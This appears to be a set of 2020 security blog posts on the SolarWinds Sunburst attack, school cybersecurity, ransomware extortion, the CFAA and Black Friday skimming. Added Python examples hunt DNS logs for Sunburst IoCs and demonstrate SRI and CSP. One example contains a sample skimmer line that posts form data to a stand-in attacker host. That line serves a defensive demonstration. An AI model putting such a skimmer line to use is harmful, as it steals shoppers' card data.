Categories
Security

The cyberattack that could only happen in 2020

I’m sure you have already heard the news. Last week, we learned that (likely) Russian nation-state hackers conducted a massive APT campaign that impacted thousands of companies and government agencies through tainted updates of the SolarWinds Orion platform. This sophisticated supply-chain attack ensnared over 200 public and private organizations, with the first tainted updates dating back to March.

We are relatively early in the process of deconstructing this stealthy attack — more details will emerge over time, including what the Russian APT group was really after, though we do know they monitored communications of hacked organizations for months. The US Cybersecurity and Infrastructure Security Agency (CISA) called the attack a “grave risk” to national security, while others described it as devastating to the economy, infrastructure, and public trust on a level not seen since the ShadowBrokers leaks.

Attacks like these are scary as hell, but they’re not going away. That’s why it’s important to share what we know, so there doesn’t have to be a “next time.”

Massive Russian hack leaves private and public sector reeling

If you were in a minor state of shock after learning about the presumed Russian hack, you weren’t alone. As if our supply chain, infrastructure, and business security weren’t already taxed enough by the pandemic, IT teams running SolarWinds software must now contend with complex mitigation efforts to root out backdoors slipped into Orion platform updates earlier this year. The boobytrapped updates pushed the Sunburst backdoor onto victim networks, where it lay dormant for 12 to 14 days before beaconing basic host details to a remote C&C server. If the target looked valuable, the threat actors then escalated to hands-on intrusion of select networks.

It’s important to note that of the 18,000+ organizations that received malicious updates through Orion, only around 200 were singled out for follow-on activity. Many businesses may therefore be sitting on a dormant copy of Sunburst without knowing it. CISA advises: “Organizations with suspected compromises need to be highly conscious of operational security, including when engaging in incident response activities and planning and implementing remediation plans.” With that caveat in mind, there are a few proactive steps you can take:

  • Immediately isolate any systems running Orion platform versions 2019.4 HF 5 through 2020.2.1 HF 1 (released between March and June 2020), and preserve disk and memory images of them before you rebuild anything
  • Scan endpoints with an endpoint protection product such as Malwarebytes and look for detections such as Backdoor.Sunburst and Backdoor.WebShell
  • Use the Indicators of Compromise published by Malwarebytes Labs (and in the CISA alert linked below) to hunt through your DNS logs, telemetry, and other SIEM data and establish a likely timeline of intrusion
  • Perform a comprehensive security sweep to review and harden your physical and cloud infrastructure, with particular attention to credentials and SAML signing keys the intruders could have taken
  • Upgrade to Orion platform version 2020.2.1 HF 2 and restore systems only once the previous steps are complete and you are confident the environment is clean
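To make the first and third steps concrete, here is an added example that is not from the original post or from CISA: a small Python triage script that decides whether an Orion version string falls inside the backdoored release range, and hunts a DNS query log for the Sunburst beacon domain (avsvmcloud.com, a publicly documented IoC). The log lines, client addresses and beacon subdomains below are constructed sample data, and the version range is the one the advisories give, encoded as an inclusive range.

```python
import re
from typing import Dict, List, Optional, Tuple

# Parent domain of the Sunburst DNS beacons, a public IoC from the CISA and
# vendor advisories. Any query for a subdomain of it deserves investigation.
SUNBURST_C2_SUFFIX = ".avsvmcloud.com"

# Affected Orion releases per the advisories: 2019.4 HF 5 through 2020.2.1 HF 1,
# encoded as an inclusive range over (major, minor, patch, hotfix).
AFFECTED_LOW = (2019, 4, 0, 5)
AFFECTED_HIGH = (2020, 2, 1, 1)
FIXED_VERSION = "2020.2.1 HF 2"

_VERSION_RE = re.compile(r"^(\d{4})\.(\d+)(?:\.(\d+))?(?:\s*HF\s*(\d+))?$", re.IGNORECASE)


def parse_orion_version(version: str) -> Optional[Tuple[int, int, int, int]]:
    """Turn '2020.2.1 HF 2' into (2020, 2, 1, 2); a missing patch or hotfix counts as 0.
    Returns None for strings that do not look like an Orion version."""
    m = _VERSION_RE.match(version.strip())
    if not m:
        return None
    major, minor, patch, hf = m.groups()
    return (int(major), int(minor), int(patch or 0), int(hf or 0))


def orion_version_affected(version: str) -> bool:
    """True if the version falls inside the backdoored release range."""
    key = parse_orion_version(version)
    if key is None:
        raise ValueError(f"unrecognised Orion version string: {version!r}")
    return AFFECTED_LOW <= key <= AFFECTED_HIGH


# Constructed sample DNS log (not real telemetry): "<timestamp> <client ip> <query name>".
SAMPLE_DNS_LOG = """\
2020-06-20T03:14:07Z 10.0.4.21 updates.solarwinds.com
2020-06-20T03:14:09Z 10.0.4.21 7sbvaemscs0mc925tb99.appsync-api.us-west-2.avsvmcloud.com
2020-06-20T03:15:11Z 10.0.7.5 login.microsoftonline.com
2020-06-20T03:15:12Z 10.0.7.5 avsvmcloud.com.example.net
2020-06-21T03:14:10Z 10.0.4.21 k5kcubuassl3alrf7gm3.appsync-api.eu-west-1.avsvmcloud.com
"""


def is_sunburst_beacon(qname: str) -> bool:
    """Match subdomains of the C2 parent on a full label boundary, so a look-alike
    such as 'avsvmcloud.com.example.net' does not fire."""
    q = qname.rstrip(".").lower()
    return q.endswith(SUNBURST_C2_SUFFIX)


def hunt_dns_log(log_text: str) -> List[Dict[str, str]]:
    """Return the records whose query name is a Sunburst beacon, in log order."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue  # skip malformed lines rather than crash mid-hunt
        ts, client, qname = parts
        if is_sunburst_beacon(qname):
            hits.append({"ts": ts, "client": client, "qname": qname})
    return hits


def first_beacon_per_host(hits: List[Dict[str, str]]) -> Dict[str, str]:
    """Earliest beacon timestamp per client. Given the 12 to 14 day dormancy before
    the first beacon, this bounds when the host was backdoored from above."""
    first: Dict[str, str] = {}
    for h in sorted(hits, key=lambda h: h["ts"]):  # ISO-8601 UTC stamps sort lexically
        first.setdefault(h["client"], h["ts"])
    return first


if __name__ == "__main__":
    for v in ("2019.4 HF 5", "2020.2", "2020.2.1 HF 1", FIXED_VERSION, "2019.4 HF 4"):
        print(f"{v:16s} affected={orion_version_affected(v)}")
    beacons = hunt_dns_log(SAMPLE_DNS_LOG)
    for b in beacons:
        print("beacon:", b)
    print("first beacon per host:", first_beacon_per_host(beacons))
```

Two practical notes: the beacon match is a suffix match on a label boundary, so queries for the bare parent domain (sinkholed after disclosure) are deliberately not counted, and the version check accepts the whole advisory range rather than the three specific builds SolarWinds named, which errs on the side of isolating a host.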

For more technical information on the cyberattack from CISA: https://us-cert.cisa.gov/ncas/alerts/aa20-352a

Most US schools fail to secure distance learners

Education in the United States faced a crisis this year. The looming threat of the coronavirus — which spreads easily in enclosed classrooms — forced schools across the country to develop new strategies for education, most involving some form of distance learning.

The dramatic stress of this transition on teachers, parents, and students is well-known. But the impact of long-term distance learning on the cybersecurity posture of schools and districts has not yet been studied — until now. Researchers at Malwarebytes surveyed IT decision-makers and students from K–12 and trade schools, as well as colleges, throughout the US to compile a report on how education security has fared in the wake of the pandemic.

The results paint a rather grim portrait; the education sector, having always struggled with lack of IT budget and personnel, was ill-equipped to move millions of students to a distance learning model. And despite Herculean efforts by IT teams to connect every student and teacher, cybersecurity often slipped through the cracks.

US distance learners remain vulnerable to cyberattack

US schools have been under tremendous pressure over the last 10 months. Forced to close their doors with little warning, teachers, administrators, and IT teams spent the first few months of the pandemic simply figuring out logistics, such as how to get students access to school resources, devices, and Internet service. Unlike most workplaces, schools have been slower to adopt new technologies, and they were not set up for an easy transition to a distance learning model.

Yet even now, halfway through the schoolyear, educational institutions are struggling with cybersecurity for distance learners. Nearly half of all schools did not change their cybersecurity protocols in response to the new distance learning model, which resulted in a number of issues that dramatically increased IT workload and put undue strain on teachers. Some schools even suffered cyberattacks that delayed their distance learning lesson plans for up to a week. Other key takeaways from the report include:

  • 51 percent of IT decision-makers said that no students, teachers, staff, or guests (including parents) were required to enroll in cybersecurity training before the new school year began
  • 47 percent said their schools developed no additional requirements — no distance learning read-throughs, no antivirus tool installations — for the students, faculty, or staff who connected to the school’s network
  • 46 percent of students said their schools suffered a cyberattack (though only 3 percent of IT professionals admitted to the same); on the flip side, of those who engaged in security best practices before the transition to distance learning, none experienced a breach or had to cancel a single day of learning due to a cyberattack

Clearly, security awareness makes a difference in the overall safety of an organization. In fact, of those who were well-studied in cybersecurity, fewer suffered sustained, excess IT workload or experienced Zoombombing attacks than those who were less prepared. However, knowledge is only half the battle. Many respondents were saddled with device and data shortages. Other schools fell flat on security budget. Additional IT challenges presented by distance learning include the following:

  • 40 percent of educational IT pros said their schools are still missing laptops, computers, or tablets for students
  • 28 percent are still missing these devices for teachers
  • 20 percent of IT decision-makers said they had trouble convincing their schools to invest in cybersecurity
  • 44 percent admitted to difficulties in managing the sudden increase of devices connected to the school network
  • 80 percent said there was a steep learning curve for teachers, students, and staff to adapt to online learning tools

But the report wasn’t all doom and gloom. IT professionals had a gargantuan task in front of them to keep teachers teaching and students learning, and for the most part, they were up to the task. About 72 percent of schools provided Chromebooks, tablets, and hotspots to students, and 59 percent distributed laptops, external microphones, and webcams to teachers. More than 70 percent deployed new software tools for distance learning, including Google Classroom and Zoom.

Unfortunately, despite super-human efforts by some educational IT teams, lack of resources, personnel, and budget have strained an already impacted security posture to nearly the breaking point. About 76 percent of respondents experienced connectivity issues, 30 percent suffered a Zoombombing attack, and 52 percent of teachers had to step in and solve an IT or security issue for students and parents. On the bright side, actual cyberattacks were relatively rare.

So, what can educational IT teams do to improve their school’s security posture in 2021 and beyond? Here’s what the report suggests:

  • Create and train teachers and staff on new cybersecurity policies relevant to distance learning (For other businesses, this can be an additional set of rules related to remote work/work from home)
  • Develop requirements that direct teachers and parents to the appropriate point person in IT or security, should issues arise that need solving quickly
  • Implement access rules, including whether students should use a VPN or password manager to access the school’s network and accounts
  • Host cybersecurity training events for teachers, staff, students, and parents

For more information on the state of education security in the US, read the full report from Malwarebytes Labs here: https://resources.malwarebytes.com/files/2020/12/Lessons-in-cybersecurity_How-education-coped-in-the-shift-to-distance-learning_Malwarebytes.pdf

Paying the ransom. Damned if you do, damned if you don’t

There isn’t a person on Earth who would argue that 2020 has been a good year for fighting viruses. Turns out, it’s also been a tough one for ransomware.

While ransomware attacks have been arguably ramping up since 2016, it was 2020 that rained expensive ransom threats down on companies from a wide range of increasingly dangerous and emboldened cybercriminal gangs. Ryuk, Sodinokibi, Maze, and others doubled down on their dastardly deeds by not only encrypting and withholding sensitive data, but threatening to make it public.

In a stunning end-of-the-year development, ransomware actors showed belligerent persistence by cold calling organizations that refrained from paying the ransom or targeting them with an angry Facebook ad campaign. Meanwhile, cybercriminals have increasingly been hanging onto the files of those that do pay the ransom for auction or re-exploitation. It seems like businesses are either damned if they pay the ransom, or damned if they don’t. So what’s the right move?

Ransomware authors push the envelope, emboldened by success

Ransomware authors are having a field day — or rather, a field year. In 2019, the average ransom payment was $41,000. A year later, it was $234,000, about a 470 percent increase. Ransom demands have skyrocketed in 2020, as have their frequency and potency. Even if organizations are following security best practices by ignoring ransom notes and restoring from backups, they can no longer claim victory. In fact, businesses can run into trouble whether they refuse to pay the ransom or pay in full.

Victims of ransomware attacks who don’t compensate their captors are now rewarded with a not-so-friendly phone call from cybercriminals, marking an escalation in tactics that include threatening to notify journalists of the breach or leaking data onto public sites. Ransomware gangs such as Maze, Ryuk, Conti, and Egregor/Sekhmet have been engaging in these cold calls as far back as August, often dialing from a call center and using a script. The callers make vague threats about continuing to monitor victim endpoints and issue an ultimatum: Pay up now or the problems with your network “will never end.”

To add insult to injury, the threat actors behind Ragnar Locker ransomware have cooked up a similar scheme, this time pressuring victims into paying via fraudulent Facebook ads. According to Brian Krebs, one such ad was taken out against Italian beverage company Campari Group, which had already publicly acknowledged a malware attack. Cybercriminals used hacked accounts to pay for the ads, which Facebook did eventually detect as a scam, but not before displaying them to thousands of people.

On the flip side, ransomware gangs are increasingly failing to make good on their promise of deleting stolen data once the ransom has been paid. Back in 2019, Maze introduced the idea of double extortion — ransoming data plus threatening to release it publicly — and other ransomware operators followed suit, dumping sensitive files onto data leak sites. Over the summer, Sodinokibi took this a step further. When threatening victims to pay up didn’t work, they began auctioning off their stolen data online, charging hefty prices to the highest bidder (often a competitor).

These tactics reveal an uncomfortable truth: There’s no way to tell whether a cybercriminal group has actually deleted the files they promise to delete after you pay the ransom. According to Coveware’s Q3 2020 report on ransomware, groups such as Sodinokibi, Conti, Maze, Sekhmet/Egregor, Mespinoza, and Netwalker are using fake data as proof of deletion or even re-extorting the same victim.

So, what’s an IT/security professional to do? The FBI has flip-flopped on its official position about whether organizations should pay the ransom, first staying mum on the topic, then stating unequivocally that the ransom should never be paid. For a while, many in the security industry were inclined to agree. But that’s a tough pill to swallow for individuals. Would you pay a $200 ransom to return your PhD thesis, which represents months of work? What about for pictures of your baby’s first year?

As ransomware actors become more and more aggressive — not just stealing data and threatening to release it, but interrupting operations in hospitals, schools, and cities — some in the security industry have changed their tune. There are many who believe that in rare cases, organizations should try to negotiate for their most important files back. An entire industry of cyber insurance providers has popped up to cover companies, should their files be ransomed for exorbitant amounts.

The long and short of it is there’s no one-size-fits-all answer when it comes to ransomware. Once again, the best defense against this threat is to avoid infection in the first place. If your security software doesn’t protect against the ransomware authors mentioned above, you may want to consider investing in additional protection.

Are we all hackers?

In 1986, personal computer technology was still in its relative infancy. Yet in that same year, the first PC virus appeared in the wild. In response to the growing threat of hackers, lawmakers passed the Computer Fraud and Abuse Act (CFAA), establishing any act of unauthorized access (or one that exceeds authorized access) to a computer as illegal.

Over the years, security researchers, pen testers, and others in the IT field have expressed concern about the vagueness of the law. Without defining what “without authorization” means, those in cybersecurity have questioned the ability of US courts to accurately interpret its meaning — without unduly punishing security professionals for doing their jobs.

So when the Supreme Court heard arguments in the computer crimes case Van Buren v. United States on Monday, November 30, the IT and security communities took notice. Its ruling in this case could significantly broaden or narrow the scope of the law.

With the Department of Justice having charged a police sergeant for running a search in a license-plate database he was authorized to use, but for a purpose outside his job, several justices expressed alarm that a ruling in the government’s favor “risked making a federal criminal of us all.”

The 1986 Computer Fraud and Abuse Act (CFAA) states that whoever has “knowingly accessed a computer without authorization or exceeding authorized access” is subject to a fine and imprisonment scaled to the type of information obtained or the damage caused to the computer. Seems pretty straightforward on the surface. But as you dig deeper into the law’s provisions, the broad range of prohibited actions and protected data described can spin the head of the most seasoned security professional. For example, here are some of the types of data that are illegal to obtain according to the law:

  • Data that requires protection from disclosure for national security purposes
  • Information contained in a financial record of a financial institution
  • Information from any department or agency of the United States
  • Information from any protected computer

Besides the aforementioned “unauthorized access” provision, the CFAA also bans the following actions:

  • Knowingly causing the transmission of a program, information, code, or command, and as a result, causing damage to a protected computer
  • Knowingly and with intent to defraud traffic using a password or similar information to access a computer, which affects commerce or is used by or for the US government
  • With intent to extort, transmitting any communication containing any threat to cause damage to a protected computer

Amendments to the law over the years have resulted in this hodge-podge of changing provisions, and the punishments for violating any one of them range from a slap-on-the-wrist fine to up to 20 years in prison. For a pen tester whose job is to access systems in ways their operators never intended, covered only by a written scope and rules of engagement, the danger of a judge misinterpreting any one of these provisions likely keeps her up at night.

The ruling in the Van Buren case, then, could set the stage for either clarifying an obscure law or for making a mess for bug testers, ethical hackers, or even folks sharing their Netflix password. (Under the current interpretation of the law, sharing a password to an account is technically illegal, though no prosecutor has ever charged someone for this “crime.”)

Looking closely at the spirit of the law, its original intent was to prevent cybercriminals from hacking into personal or business computers and stealing data or causing damage. However, without a firm definition of the meaning of “authorized access,” including addendums for potential exceptions to the rule, the Supreme Court could possibly make hackers of us all. After all, anytime you access a website, a server, the cloud, a streaming service — you are accessing someone else’s computer.

Let’s hope the Supreme Court gives this law the 21st century update it requires by adding sharper focus that serves a punishment fit for the crime, while letting the good guys keep fighting the good fight.

For more information on the CFAA, here’s an article from the National Association of Criminal Defense Lawyers: https://www.nacdl.org/Landing/ComputerFraudandAbuseAct

And for a closer legal analysis of the Supreme Court case: https://www.politico.com/news/2020/11/30/supreme-court-computer-crime-law-441441

Cybercriminal Monday: remote employees and retailers take caution

For the last 10+ years, the post-Thanksgiving shopping bonanza known as Black Friday has courted crowds and controversy, with major retailers deciding to open their doors on Thanksgiving Day to mobs of rabid customers looking for deep discounts.

This year, things look a little different. While some doors will open on Black Friday, many shoppers will choose to look for deals online instead. And even though online shopping may spare consumers from catching COVID-19, there’s no guarantee they won’t pick up a different kind of infection — and pass it on to corporate networks.

Meanwhile, online retailers and organizations with ecommerce platforms should take extra precautions this year, as cybercriminals have already ramped up their attacks on a wide variety of shopping sites.

Watch out for Black Friday and Cyber Monday pitfalls

As the nation heads into a holiday season on lockdown, we once again face norms-defying circumstances: Thanksgiving gatherings will be much smaller and Black Friday will likely have crowds rushing to their laptops instead of their local malls.

Since the start of the pandemic, online spending has increased by 75 percent. Ecommerce cybercrime has followed suit, with a 25 percent rise in credit card skimming observed in the first month of the pandemic alone. Scams laced with COVID-19 misinformation have tricked thousands into giving out their personal and business data or led to infections of home and corporate networks. And ransomware attacks have taken advantage of a vulnerable and distributed workforce. All this means the stakes are even higher for the coming week of holiday shopping.

In fact, expect stores to extend Black Friday deals through the month and beyond, luring shoppers repeatedly back to their ecommerce pages for maximum return on investment. But the old methods for staying safe while shopping online are not all relevant in today’s threat landscape. For organizations with remote employees who may also use their work device for personal use (or personal device for work activities), it’s prudent to send out reminders this holiday shopping season to keep personal business — especially online purchases — separate from company business. Here are a few you can send to your staff:

  • Just because a website uses HTTPS and has a padlock does not mean it is safe. The padlock only means that your connection to the server named in the address bar is encrypted and that the server holds a valid certificate for that name. Cybercriminals can register a look-alike domain, obtain a perfectly valid certificate for it, and receive your card details over a “secure” connection. All the padlock guarantees is that third parties cannot read or tamper with the exchange in transit; it says nothing about who is on the other end.
  • To protect against web skimmers, consider equipping personal devices with antivirus software that has web protection, or browser extensions that block malicious content. All work devices should be protected with the same.
  • Avoid clicking directly on targeted ads for a particular deal. Online ads could contain exploits delivered via malvertising, which could deliver malicious payloads or divert users to scam pages. If there’s an ad for a great deal, go directly to the retailer’s website instead.
  • Do not use public WiFi to shop online. Also avoid using the company’s VPN for that purpose. The best bet is to shop from a password-secured home network or to purchase your own VPN for home use.

In addition, online retailers and other ecommerce sites should take particular precautions over the next month to protect against web skimmers or other online attacks. Here’s my advice for staying secure:

  • Keep your site updated to protect against cybercriminals who would exploit vulnerabilities, and that includes shoring up weak code. Make sure any admin access to the site’s backend is protected with a strong, unique password and multi-factor authentication, and is not exposed to the whole Internet.
  • Make sure any third parties, including Content Management Systems (CMSes), payment providers, and JavaScript libraries, are free from known vulnerabilities by applying all updates and reviewing any third-party code you load into the checkout page.
  • Take preventative measures by implementing safeguards such as a Content Security Policy (CSP) and Subresource Integrity (SRI), so that an injected or modified script cannot run, and cannot send card data to a host you have not approved.
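The last bullet is where most ecommerce sites fall down, so here is an added example (not code from the original post) showing the two controls in Python: it computes the SRI integrity value to pin a third-party checkout script, verifies a served copy against that pin the way a browser would, and contrasts a weak CSP that lets an injected skimmer run with a hardened one. The script bytes, the "attacker.invalid" exfiltration host and the payments.example origins are constructed for illustration, and the SRI verifier is a simplification of the browser algorithm (it accepts a match on any listed digest rather than only the strongest).

```python
import base64
import hashlib
from typing import Dict, Iterable, List

# Constructed sample: the checkout script as reviewed and pinned at deploy time,
# and a copy a web skimmer has appended an exfiltration call to.
PINNED_SCRIPT = b"window.checkout = function (cart) { return submit(cart); };\n"
TAMPERED_SCRIPT = PINNED_SCRIPT + (
    b"fetch('https://attacker.invalid/c', {method: 'POST', body: document.forms[0].innerText});\n"
)

SRI_ALGORITHMS = ("sha256", "sha384", "sha512")  # the only digests SRI permits


def sri_hash(content: bytes, algorithm: str = "sha384") -> str:
    """Build the value for <script src=... integrity="..." crossorigin="anonymous">:
    the SRI '<alg>-<base64 digest>' form."""
    if algorithm not in SRI_ALGORITHMS:
        raise ValueError("SRI permits only sha256, sha384 or sha512")
    digest = hashlib.new(algorithm, content).digest()
    return f"{algorithm}-{base64.b64encode(digest).decode('ascii')}"


def verify_sri(content: bytes, integrity: str) -> bool:
    """Accept the resource if any listed digest matches (the attribute may carry
    several space-separated values). Unknown algorithms are ignored, as browsers do."""
    for token in integrity.split():
        alg, _, _ = token.partition("-")
        if alg in SRI_ALGORITHMS and sri_hash(content, alg) == token:
            return True
    return False


def csp_header(directives: Dict[str, Iterable[str]]) -> str:
    """Serialise a directive map into a Content-Security-Policy header value."""
    return "; ".join(f"{name} {' '.join(values)}".rstrip() for name, values in directives.items())


def csp_findings(directives: Dict[str, List[str]]) -> List[str]:
    """Lint a policy for the gaps a skimmer needs: inline script, script from any
    origin, and fetch()/XHR to any origin (connect-src falls back to default-src)."""
    findings = []
    script = directives.get("script-src", directives.get("default-src", []))
    connect = directives.get("connect-src", directives.get("default-src", []))
    if "'unsafe-inline'" in script:
        findings.append("script-src allows inline scripts")
    for src in script:
        if src in ("*", "https:", "http:"):
            findings.append(f"script-src allows scripts from any {src} origin")
    for src in connect:
        if src in ("*", "https:", "http:"):
            findings.append(f"connect-src allows exfiltration to any {src} origin")
    if "object-src" not in directives:
        findings.append("object-src not set; plugin content can load")
    return findings


# Weak policy: inline scripts and any https: origin are allowed, so an injected
# skimmer tag or inline snippet runs and can post card data anywhere.
WEAK_CSP = {
    "default-src": ["'self'"],
    "script-src": ["'self'", "'unsafe-inline'", "https:"],
}

# Hardened policy (assumed payment-provider origins): only first-party and the
# pinned provider scripts run, network calls and form posts reach approved hosts
# only, and violations are reported so a skimmer attempt shows up in logs.
HARDENED_CSP = {
    "default-src": ["'self'"],
    "script-src": ["'self'", "https://js.payments.example"],
    "connect-src": ["'self'", "https://api.payments.example"],
    "form-action": ["'self'", "https://checkout.payments.example"],
    "object-src": ["'none'"],
    "base-uri": ["'self'"],
    "report-uri": ["/csp-report"],
}

if __name__ == "__main__":
    pin = sri_hash(PINNED_SCRIPT)
    print("integrity attribute:", pin)
    print("pinned copy accepted:", verify_sri(PINNED_SCRIPT, pin))
    print("tampered copy accepted:", verify_sri(TAMPERED_SCRIPT, pin))
    print("weak CSP findings:", csp_findings(WEAK_CSP))
    print("hardened CSP findings:", csp_findings(HARDENED_CSP))
    print("Content-Security-Policy:", csp_header(HARDENED_CSP))
```

SRI only helps for scripts whose content you can pin, so ask the payment provider for a versioned, immutable URL rather than a "latest" one; a script that changes under you will simply stop loading, which is the correct failure mode. The CSP is the backstop for everything SRI cannot cover: even if a skimmer gets into the page, `connect-src` and `form-action` deny it a place to send the data.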

Best wishes for a safe and happy Thanksgiving holiday!